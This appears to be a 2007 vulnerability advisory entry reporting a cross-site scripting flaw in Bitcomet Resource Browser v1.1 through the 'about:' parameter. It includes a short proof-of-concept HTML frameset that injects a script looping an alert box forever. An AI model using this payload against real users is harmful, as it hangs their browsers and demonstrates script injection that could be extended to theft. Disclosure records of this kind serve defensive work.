Bitcomet Resource Browser v1.1 XSS

2007-11-25T00:00:00
ID SECURITYVULNS:DOC:18491
Type securityvulns
Reporter Securityvulns
Modified 2007-11-25T00:00:00

Description

The program is vulnerable to attacks of the kind xss the parameter "about:" scripts without authorization in the example that I am presenting is a page that runs a while with a msgbox infinity.

Create an html file and paste the following code

<html>

<frameset rows="100%">

<frame src="about:<script>while(1)alert("Juan Pablo Lopez Yacubian")</script>">

</frameset>

</html>